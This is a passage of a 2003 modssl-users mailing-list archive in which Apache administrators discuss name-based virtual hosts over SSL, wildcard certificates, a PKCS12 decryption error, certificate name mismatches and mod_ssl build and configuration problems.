are willing and competent to do some basic browser certificate management.

But I suppose if people feel this set-up is legitimate, useful and 
non-trivial I ought to make time to write up a quick How-to and/or an 
expurgated config file. Is there a suitable Apache cookbook where such 
recipes are collected?

    Regards,
       James.

> 
> thanks
> Robert
> ----- Original Message ----- 
> From: "James Collier" 
> To: 
> Sent: Monday, January 13, 2003 12:29 PM
> Subject: Re: Confession: I use NBVHs with SSL (was Re: 2 VirtualHosts with 2 Certificates)
> 
> 
> 
>>Many thanks Owen - I'll sleep more easily now ;)
>>
>>Boyle Owen wrote:
>>
>>>>-----Original Message-----
>>>>From: James Collier [mailto:james.collier@xtra.co.nz]
>>>>
>>>>At the moment, the handshake take place using the first matching vhost 
>>>>on the basis of IP+Port, but evidently Apache then scans the decrypted 
>>>>host header and assigns the correct NBVH. 
>>>
>>>
>>>Exactly. The SSL transaction is handled by mod_ssl. The apache core is only used initially to deliver a certificate to the SSL Engine. As you rightly say, given only an IP address and port number, it simply responds with the first cert it finds in a matching VH. Having obtained a cert, mod_ssl establishes the SSL channel with the browser - thereafter, the requests are decrypted and passed "en clair" to the apache core. So now apache can apply its NBVH algorithm happily. 
>>>
>>>
>>>
>>>>This is using 1.3.x; I haven't tested 2.x yet.
>>>
>>>
>>>It will be the same. This is a feature of the HTTPS layer and is unaffected by what happens in the apache core, which is under HTTPS.
>>>
>>>
>>>
>>>>My fear is that future apache+modssl code may lock-in the first NBVH 
>>>>that matches on the basis of IP+Port, which would break my scheme.
>>>
>>>
>>>Not likely. Each request is allowed to contain its own "Host" header. So there is no reason why the server should override it. In any case, there is no mechanism for the server to "remember" that subsequent requests from a particular client were originally served from a certain VH. HTTPS is an additional onion-layer which entirely encapsulates HTTP so there should be no spillover from one to the other.
>>>
>>>Rgds,
>>>
>>>Owen Boyle
>>>
>>>
>>>
>>>> Regards,
>>>>    James.
>>>>
>>>>PS For those of you who were wondering, we use a private CA to 
>>>>issue the 
>>>>wildcard server cert.  As someone has already noted, Thawte advertise 
>>>>them as well.
>>>>
>>>>Boyle Owen wrote:
>>>>
>>>>
>>>>>>-----Original Message-----
>>>>>>From: James Collier [mailto:james.collier@xtra.co.nz]
>>>>>>
>>>>>>I realise I am on thin ice as it would be a "reasonable" 
>>>>>>optimisation to assign the final virtual host at an earlier 
>>>>>>stage than is currently the case with SSL.
>>>>>
>>>>                                       ^^^
>>>>                           I meant "apache+modssl"
>>>>
>>>>
>>>>>I wouldn't worry too much. Currently, in an SSL transaction, *all*
>>>>>information is regarded as requiring encryption - including the Host
>>>>>header in the original request. So the SSL session has to be 
>>>>
>>>>established
>>>>
>>>>
>>>>>before any traffic takes place. Anything different (e.g. putting the
>>>>>host header in the SSL layer) would be a major revision of 
>>>>
>>>>the protocol.
>>>>
>>>>
>>>>>One of two things will happen first:
>>>>>
>>>>>- IPv6 will take off, creating so many IP addresses that NBVH will be
>>>>>unnecessary and we will revert to one site, one IP.
>>>>>- A new SSL-like protocol will appear which promotes the site name to
>>>>>the SSL layer thus enabling NBVH.
>>>>>
>>>>>Either way, you'll need substantially to upgrade and reconfigure your
>>>>>server so you'll be well aware of the changes.
>>>>>
>>>>>Rgds,
>>>>>
>>>>>Owen Boyle
>>>>>
>>>>>This message is for the named person's use only. It may contain
>>>>>confidential, proprietary or legally privileged information. No
>>>>>confidentiality or privilege is waived or lost by any 
>>>>
>>>>mistransmission.
>>>>
>>>>
>>>>>If you receive this message in error, please notify the 
>>>>
>>>>sender urgently
>>>>
>>>>
>>>>>and then immediately delete the message and any copies of it 
>>>>
>>>>from your
>>>
>>>
>>>>>system. Please also immediately destroy any hardcopies of 
>>>>
>>>>the message.
>>>>
>>>>
>>>>>You must not, directly or indirectly, use, disclose, 
>>>>
>>>>distribute, print,
>>>>
>>>>
>>>>>or copy any part of this message if you are not the intended 
>>>>
>>>>recipient.
>>>>
>>>>
>>>>>The sender's company reserves the right to monitor all e-mail
>>>>>communications through their networks. Any views expressed in this
>>>>>message are those of the individual sender, except where the message
>>>>>states otherwise and the sender is authorised to state them to be the
>>>>>views of the sender's company. 
>>>>>
>>>>
>>>>______________________________________________________________________
>>>>
>>>>
>>>>>Apache Interface to OpenSSL (mod_ssl)                   
>>>>
>>>www.modssl.org
>>>
>>>
>>>>User Support Mailing List                      modssl-users@modssl.org
>>>>Automated List Manager                            majordomo@modssl.org
>>>
>>>
>>>
>>>______________________________________________________________________
>>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>>User Support Mailing List                      modssl-users@modssl.org
>>>Automated List Manager                            majordomo@modssl.org
>>>______________________________________________________________________
>>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>>User Support Mailing List                      modssl-users@modssl.org
>>>Automated List Manager                            majordomo@modssl.org
>>
>>
>>______________________________________________________________________
>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>User Support Mailing List                      modssl-users@modssl.org
>>Automated List Manager                            majordomo@modssl.org–œ…â'µêßiÇ­ ê^$‹š‡l²\0Âj²Éh®,z´®¦š+´Æ¢–)à.+-š‡l²[¬z»&¡Û,–Šàëh™«^t¸¬´Æ§j«™¨è­Ú&¢j²Éh
> 
> rg==


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jan 14 11:26:55 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 87D892AA0AE; Tue, 14 Jan 2003 11:26:55 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id CD5BF2AA085
	for ; Tue, 14 Jan 2003 11:26:53 +0100 (CET)
Received: by toftum.dk (Postfix, from userid 1001)
	id 10E826E40B4; Tue, 14 Jan 2003 11:27:59 +0100 (CET)
Date: Tue, 14 Jan 2003 11:27:58 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Confession: I use NBVHs with SSL (was Re: 2 VirtualHosts with 2 Certificates)
Message-ID: <20030114102758.GC17443@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <484A6CA492BE654395D208B1D8D5393972F779@SOMEXEVS001.ex.ordersx.org> <3E2305A1.3000904@xtra.co.nz> <002c01c2bb83$70bc6560$0500a8c0@rdcss.com> <3E23E140.5020308@xtra.co.nz>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <3E23E140.5020308@xtra.co.nz>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, Jan 14, 2003 at 11:06:56PM +1300, James Collier wrote:
> robert@rdcss.com wrote:
> >Are there any docs for setting this up?

It isn't any different than setting up with seperate certs, just use the
same cert in each vhost.

> Not as such - I cooked the site up as a one-off, with the feeling that 
> much of it came under the dirty hack classification (particularly as 
> almost every mod-ssl document contains wording to the effect of "Don't 
> ever ever ever under any circumstances try to use NBVHs with mod-ssl")
> 
One problem being that it isn't fully supported by all browsers, and that
some people might argue that this is less secure. AFAICT only thawte sells
wildcard certs.

> There's nothing particularly innovative or devious here - and I'm in the 
> rare position of working with a smallish closed user group whose members 
> are willing and competent to do some basic browser certificate management.
> 
> But I suppose if people feel this set-up is legitimate, useful and 
> non-trivial I ought to make time to write up a quick How-to and/or an 
> expurgated config file. Is there a suitable Apache cookbook where such 
> recipes are collected?
> 
The documentation would be the obvious place IMHO - see
http://httpd.apache.org/docs-project/ - if you get the time to write
something, I can probably be convinced to commit it for the 2.x docs.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jan 14 14:31:50 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 897CF2AA0A2; Tue, 14 Jan 2003 14:31:50 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from localhost.localdomain (sein.itera.ee [194.126.109.126])
	by master.modssl.org (Postfix) with ESMTP id 9D34E2AA087
	for ; Tue, 14 Jan 2003 14:31:48 +0100 (CET)
Received: (from hannu@localhost)
	by localhost.localdomain (8.11.6/8.11.6) id h0EFPFf15681
	for modssl-users@modssl.org; Tue, 14 Jan 2003 15:25:15 GMT
X-Authentication-Warning: localhost.localdomain: hannu set sender to hannu@tm.ee using -f
Subject: RE: sorry all, test
From: Hannu Krosing 
To: modssl-users@modssl.org
In-Reply-To: <484A6CA492BE654395D208B1D8D5393973A66A@SOMEXEVS001.ex.ordersx.org>
References: 
	 <484A6CA492BE654395D208B1D8D5393973A66A@SOMEXEVS001.ex.ordersx.org>
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
Organization: 
Message-Id: <1042557914.15533.23.camel@huli>
Mime-Version: 1.0
X-Mailer: Ximian Evolution 1.2.1 
Date: 14 Jan 2003 15:25:14 +0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Hannu Krosing 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Mon, 2003-01-13 at 09:32, Boyle Owen wrote:
> Nope.. It didn't work. We didn't see anything.
> 
> >-----Original Message-----
> >From: Kyle O'Donnell [mailto:kyleo@onicrom.com]
> >Sent: Sonntag, 12. Januar 2003 12:41
> >To: modssl-users@modssl.org
> >Subject: sorry all, test
> >
> >
> >test
> >______________________________________________________________________
> >Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >User Support Mailing List                      modssl-users@modssl.org
> >Automated List Manager                            majordomo@modssl.org
> >
> 
> This message is for the named person's use only.

As my name is not Modssl i was legally unable to read your reply ...

>  It may contain
> confidential, proprietary or legally privileged information. No
> confidentiality or privilege is waived or lost by any mistransmission.
> If you receive this message in error, please notify the sender urgently
> and then immediately delete the message and any copies of it from your
> system. Please also immediately destroy any hardcopies of the message.

Yes, I'll destroy my harddisk immediately.

> You must not, directly or indirectly, use, disclose, distribute, print,
> or copy any part of this message if you are not the intended recipient.
> The sender's company reserves the right to monitor all e-mail
> communications through their networks. Any views expressed in this
> message are those of the individual sender, except where the message
> states otherwise and the sender is authorised to state them to be the
> views of the sender's company. 

Are you authorized to say "Nope.. It didn't work" ?

-- 
Hannu Krosing 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jan 14 16:08:35 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D31692AA0A0; Tue, 14 Jan 2003 16:08:35 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from palrel10.hp.com (palrel10.hp.com [156.153.255.245])
	by master.modssl.org (Postfix) with ESMTP id 28FF02AA085
	for ; Tue, 14 Jan 2003 16:08:34 +0100 (CET)
Received: from harbour.india.hp.com (harbour.india.hp.com [15.76.114.31])
	by palrel10.hp.com (Postfix) with ESMTP id 844DFC00D66
	for ; Tue, 14 Jan 2003 07:08:30 -0800 (PST)
Received: from india.hp.com (nt45170.india.hp.com [15.10.45.170]) by harbour.india.hp.com with ESMTP (8.8.6 (PHNE_17190)/8.8.6 SMKit7.02) id UAA16032 for ; Tue, 14 Jan 2003 20:54:35 +0530 (IST)
Message-ID: <3E24265A.1EB9E3B2@india.hp.com>
Date: Tue, 14 Jan 2003 20:31:46 +0530
From: Anbuchezhian 
Organization: HP
X-Mailer: Mozilla 4.75 [en] (Windows NT 5.0; U)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: OpenSSL 0.9.6g - pkcs problem
References: <484A6CA492BE654395D208B1D8D5393973A66A@SOMEXEVS001.ex.ordersx.org> <1042557914.15533.23.camel@huli>
Content-Type: multipart/mixed;
 boundary="------------34AE12DE667B174E0184970C"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Anbuchezhian 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.
--------------34AE12DE667B174E0184970C
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Hi,

I am experiencing the following problem while trying to migrate the Netscape
certificates, for Apache web server, using OpenSSL 0.9.6g. Please note that
this doesn't occur with the OpenSSL version 0.9.6c. The following is the
output from the openssl utility. Please give your inputs.

--- Start of Error Message ---

Enter Password or Pin for "Communicator Certificate DB":
pk12util: PKCS12 EXPORT SUCCESSFUL
MAC verified OK
Enter PEM pass phrase:
Verifying password - Enter PEM pass phrase:
Error outputting keys and certificates
1702:error:06065064:digital envelope routines:EVP_DecryptFinal:bad
decrypt:evp_enc.c:283:
1702:error:23077074:PKCS12 routines:PKCS12_pbe_crypt:pkcs12
cipherfinal
error:p12_decr.c:95:
1702:error:2306A075:PKCS12 routines:PKCS12_decrypt_d2i:pkcs12
pbe crypt
error:p12_decr.c:121:
error in getting key .pem file...

--- End of Error Message ---

Thanks in advance.

Regards,
Anbu

--------------34AE12DE667B174E0184970C
Content-Type: text/x-vcard; charset=us-ascii;
 name="chezhian.vcf"
Content-Transfer-Encoding: 7bit
Content-Description: Card for Anbuchezhian
Content-Disposition: attachment;
 filename="chezhian.vcf"

begin:vcard 
n:Chelliah;Anbuchezhian
tel;work:91-80-2051166
x-mozilla-html:FALSE
adr:;;;;;;
version:2.1
email;internet:chezhian@india.hp.com
fn:Anbuchezhian
end:vcard

--------------34AE12DE667B174E0184970C--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan 15 16:58:00 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2C1F02AA0A3; Wed, 15 Jan 2003 16:58:00 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from avocet.mail.pas.earthlink.net (avocet.mail.pas.earthlink.net [207.217.120.50])
	by master.modssl.org (Postfix) with ESMTP id 4F4E62AA087
	for ; Wed, 15 Jan 2003 16:57:58 +0100 (CET)
Received: from bigbird.psp.pas.earthlink.net ([207.217.78.244])
	by avocet.mail.pas.earthlink.net with esmtp (Exim 3.33 #1)
	id 18YpvP-00070E-00
	for modssl-users@modssl.org; Wed, 15 Jan 2003 07:57:55 -0800
Received: (from nobody@localhost)
	by bigbird.psp.pas.earthlink.net (8.10.2+Sun/8.10.2) id h0FFvsv03446
	for modssl-users@modssl.org; Wed, 15 Jan 2003 07:57:54 -0800 (PST)
Date: Wed, 15 Jan 2003 07:57:54 -0800
From: "cy user" 
To: modssl-users@modssl.org
Subject: Security Alert ? with VirtualHost
Message-ID: 
X-Originating-IP: 134.9.11.140
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "cy user" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

I running Sol. 8 Apache/1.3.27 and mod_ssl/2.8.12

I have this set in httpd.conf for Virtual host:


Redirect / https://host/


Now if some one enters or clicks on a link that says: 
http://host.company.com  
http://host  
https://host 
it redirects great, and the Security Alert has all green check marks. Great...

But if a users enters in the link like so:
https://host.company.com/  https://host.company.com
It goes torward the site but the Security Alert complains that the certificate
is invalid or does not match the name of the site. 

What is a good way to correct the Security Alert message, is it not done with
VirtualHost??  Thanks Up Front...

Rob

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan 15 17:02:48 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 301EA2AA0A2; Wed, 15 Jan 2003 17:02:48 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mallard.mail.pas.earthlink.net (mallard.mail.pas.earthlink.net [207.217.120.48])
	by master.modssl.org (Postfix) with ESMTP id 75E722AA0A3
	for ; Wed, 15 Jan 2003 17:02:42 +0100 (CET)
Received: from grover.mail.pas.earthlink.net ([207.217.121.249] helo=grover.psp.pas.earthlink.net)
	by mallard.mail.pas.earthlink.net with esmtp (Exim 3.33 #1)
	id 18Ypzy-0007TL-00
	for modssl-users@modssl.org; Wed, 15 Jan 2003 08:02:38 -0800
Received: (from nobody@localhost)
	by grover.psp.pas.earthlink.net (8.11.6+Sun/8.10.2) id h0FG2a229930
	for modssl-users@modssl.org; Wed, 15 Jan 2003 08:02:36 -0800 (PST)
Date: Wed, 15 Jan 2003 08:02:36 -0800
From: "cy user" 
To: modssl-users@modssl.org
Subject: Security Alert ? with VirtualHost 
Message-ID: 
X-Originating-IP: 134.9.11.140
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "cy user" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

I running Sol. 8 Apache/1.3.27 and mod_ssl/2.8.12

I have this set in httpd.conf for Virtual host:


Redirect / https://host/




Now if some one enters or clicks on a link that says:  http://host.company.com
   http://host    https://host  
it redirects great, and the Security Alert has all green check marks. Great...

But if a users enters in the link like so: https://host.company.com/  
https://host.company.com 
It goes torward the site but the Security Alert complains that the certificate
is invalid or does not match the name of the site. 

What is a good way to correct the Security Alert message, is it not done with
VirtualHost??  Thanks Up Front...

Rob

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan 15 21:12:14 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id BCD462AA0AE; Wed, 15 Jan 2003 21:12:14 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from hotmail.com (oe55.law8.hotmail.com [216.33.240.211])
	by master.modssl.org (Postfix) with ESMTP id 3B47E2AA0A2
	for ; Wed, 15 Jan 2003 21:12:08 +0100 (CET)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Wed, 15 Jan 2003 12:00:29 -0800
X-Originating-IP: [199.231.48.128]
From: "Satish Jeejula" 
To: 
Subject: mod-ssl-2.8.12 & Apache 1.3.27 problem
Date: Wed, 15 Jan 2003 15:00:46 -0500
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_001B_01C2BCA6.E25FFE10"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4920.2300
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4920.2300
Message-ID: 
X-OriginalArrivalTime: 15 Jan 2003 20:00:29.0945 (UTC) FILETIME=[C1251E90:01C2BCD0]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Satish Jeejula" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_001B_01C2BCA6.E25FFE10
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hello All,

I am trying to compile apache 1.3.27 with mod_ssl-2.8.12 & openssl-0.9.7

I have succesfully compiled and build openssl. While trying to apply =
mod_ssl to apache source and building, I get the error below.

        cd ..\..
        cd modules\ssl
        NMAKE -nologo -f makefile RECURSE=3D0
        cl.exe /nologo /c /O2 /MD /W3 /GX /DNDEBUG /DWIN32 /D_WINDOWS =
/DSHARED_MODULE /DEAPI /DMOD_SSL=3D208112 /DMOD_SSL_VERSION=3D\"2.8.12\" =
/I..\..\include /I..\..\os\win32 /Id:\temp\openssl\include mod_ssl.c
mod_ssl.c
mod_ssl.c(242) : error C2078: too many initializers
NMAKE : fatal error U1077: 'cl.exe' : return code '0x2'
Stop.
NMAKE : fatal error U1077: '"D:\Program Files\Microsoft Visual =
Studio\VC98\bin\N
MAKE.EXE"' : return code '0x2'
Stop.
NMAKE : fatal error U1077: '"D:\Program Files\Microsoft Visual =
Studio\VC98\bin\N
MAKE.EXE"' : return code '0x2'
Stop.

 I have read thru this mailing list about the error and found that I =
need to apply EAPI module while configuring. So when ever I tried that =
option (--with-eapi-only), it said 'Bad Argument'.=20

So can help me out with this problem please .....

Thanks,
Satish

------=_NextPart_000_001B_01C2BCA6.E25FFE10
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Hello All,


 


I am trying to compile apache 1.3.27 =
with=20
mod_ssl-2.8.12 & openssl-0.9.7


 


I have succesfully compiled and build =
openssl.=20
While trying to apply mod_ssl to apache source and building, I get the =
error=20
below.


 


        cd=20
..\..
        cd=20
modules\ssl
        NMAKE -nologo =
-f=20
makefile RECURSE=3D0
        =
cl.exe /nologo=20
/c /O2 /MD /W3 /GX /DNDEBUG /DWIN32 /D_WINDOWS /DSHARED_MODULE /DEAPI=20
/DMOD_SSL=3D208112 /DMOD_SSL_VERSION=3D\"2.8.12\" /I..\..\include =
/I..\..\os\win32=20
/Id:\temp\openssl\include mod_ssl.c


mod_ssl.c
mod_ssl.c(242) : error =
C2078: too many=20
initializers
NMAKE : fatal error U1077: 'cl.exe' : return code=20
'0x2'
Stop.
NMAKE : fatal error U1077: '"D:\Program =
Files\Microsoft Visual=20
Studio\VC98\bin\N
MAKE.EXE"' : return code '0x2'
Stop.
NMAKE : =
fatal=20
error U1077: '"D:\Program Files\Microsoft Visual =
Studio\VC98\bin\N
MAKE.EXE"'=20
: return code '0x2'
Stop.


 


 I have read thru this mailing =
list about the=20
error and found that I need to apply EAPI module while configuring. So =
when ever=20
I tried that option (--with-eapi-only), it said 'Bad Argument'. =



 


So can help me out with this problem =
please=20
.....


 


Thanks,


Satish


------=_NextPart_000_001B_01C2BCA6.E25FFE10--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jan 16 15:16:52 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 64FBD2AA08F; Thu, 16 Jan 2003 15:16:52 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id 0634E2AA087
	for ; Thu, 16 Jan 2003 15:16:51 +0100 (CET)
Received: by toftum.dk (Postfix, from userid 1001)
	id 77A1B6E40B7; Thu, 16 Jan 2003 15:18:13 +0100 (CET)
Date: Thu, 16 Jan 2003 15:18:13 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Wildcard Certs
Message-ID: <20030116141813.GA13058@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Wildcard certs have been discussed here on the list recently and
Thawte has been mentioned as the place to buy wildcard certs. 
We decided to check and got the following answer:

---------------------------------------------------------------------
We unfortunately discontinued the wild cards certs about 8 months ago                                                                          and no                                                                                                                                         longer issue them.                                                                                                                                                                                                                                                                            You would have to apply for each SSL individually.  
---------------------------------------------------------------------

So neither Thawte or Verisign (who own Thawte) issue wildcard certs.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jan 16 20:01:26 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E61A72AA0C3; Thu, 16 Jan 2003 20:01:25 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from matrix.pelathe.org (100.34.cm.sunflower.com [24.124.34.100])
	by master.modssl.org (Postfix) with ESMTP id 07FC52AA087
	for ; Thu, 16 Jan 2003 20:01:23 +0100 (CET)
Received: from matrix (matrix.pelathe.org [192.168.1.200])
	by matrix.pelathe.org (Postfix) with ESMTP id BB4F780E20
	for ; Thu, 16 Jan 2003 00:55:40 -0600 (CST)
Content-Type: text/plain;
  charset="us-ascii"
From: "A. Putnam" 
Organization: Pelathe Comminuty Resource Center
To: modssl-users@modssl.org
Subject: fqhostname non exsistant??
Date: Thu, 16 Jan 2003 00:55:40 -0600
User-Agent: KMail/1.4.3
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Message-Id: <200301160055.40438.aputnam@pelathe.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "A. Putnam" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hey everyone, I was wondering if there was someone out there who might be=
 able=20
to help me out a little bit. I'm having a problem that's driving me nuts.=
 I'm=20
running a linux server (SuSE 8.1) that has mod_ssl pre-installed, but not=
=20
setup. I've been trying to set it up and have gotten as far as creating a=
=20
test certificate, but now I'm stumped with the FQHOSTNAME variable.=20

((Here's what it says in the httpd.conf...
# NOTE: before you can enable this module, you need a server certificate.
# A test certificate can be created by entering
# 'cd /usr/share/doc/packages/mod_ssl; ./certificate.sh' as root.
# Also, you need to set the ServerName inside the 
# block to the fully qualified domain name
# (see $FQHOSTNAME in /etc/sysconfig/network/config). ))

As it turns out my config file doesn't have the FQHOSTNAME variable at al=
l. Is=20
it in another associated file maybe? I've been all over the web and while=
 I=20
can find plenty about mod-ssl, I've found next to nothing about writing m=
y=20
own FQHOSTNAME variable. I'm still not all that fluent in scripting unix =
code=20
so I'm at a bit of a loss. If anyone knows how I can create/find/configur=
e=20
this variable, I'd really appreciate the help. I'm setup to use the YaST2=
=20
config system as well as direct coding to the files, if that helps at all=
=2E=20

Thanks.=20
--=20
A. Putnam
Assistant IT Administrator
Pelathe Community Resource Center

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jan 16 20:28:47 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2493E2AA08F; Thu, 16 Jan 2003 20:28:47 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from matrix.pelathe.org (100.34.cm.sunflower.com [24.124.34.100])
	by master.modssl.org (Postfix) with ESMTP id 67A8F2AA087
	for ; Thu, 16 Jan 2003 20:28:41 +0100 (CET)
Received: from matrix (matrix.pelathe.org [192.168.1.200])
	by matrix.pelathe.org (Postfix) with ESMTP id 19E1D80E20
	for ; Thu, 16 Jan 2003 01:22:58 -0600 (CST)
Content-Type: text/plain;
  charset="iso-8859-1"
From: "A. Putnam" 
Organization: Pelathe Comminuty Resource Center
To: modssl-users@modssl.org
Subject: Re: fqhostname non exsistant??
Date: Thu, 16 Jan 2003 01:22:58 -0600
User-Agent: KMail/1.4.3
References: <200301160055.40438.aputnam@pelathe.org>
In-Reply-To: <200301160055.40438.aputnam@pelathe.org>
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Message-Id: <200301160122.58585.aputnam@pelathe.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "A. Putnam" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Just a little amendment to this, that note wasn't in httpd.conf, it's in=20
/sysconfig/apache. I had them both open and got them mixed up, sorry.

On Thursday 16 January 2003 00:55, A. Putnam wrote:
> Hey everyone, I was wondering if there was someone out there who might =
be
> able to help me out a little bit. I'm having a problem that's driving m=
e
> nuts. I'm running a linux server (SuSE 8.1) that has mod_ssl pre-instal=
led,
> but not setup. I've been trying to set it up and have gotten as far as
> creating a test certificate, but now I'm stumped with the FQHOSTNAME
> variable.
>
> ((Here's what it says in the httpd.conf...
> # NOTE: before you can enable this module, you need a server certificat=
e.
> # A test certificate can be created by entering
> # 'cd /usr/share/doc/packages/mod_ssl; ./certificate.sh' as root.
> # Also, you need to set the ServerName inside the  _default_:443> # block to the fully qualified domain name
> # (see $FQHOSTNAME in /etc/sysconfig/network/config). ))
>
> As it turns out my config file doesn't have the FQHOSTNAME variable at =
all.
> Is it in another associated file maybe? I've been all over the web and
> while I can find plenty about mod-ssl, I've found next to nothing about
> writing my own FQHOSTNAME variable. I'm still not all that fluent in
> scripting unix code so I'm at a bit of a loss. If anyone knows how I ca=
n
> create/find/configure this variable, I'd really appreciate the help. I'=
m
> setup to use the YaST2 config system as well as direct coding to the fi=
les,
> if that helps at all.
>
> Thanks.

--=20
A. Putnam
Assistant IT Administrator
Pelathe Community Resource Center

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

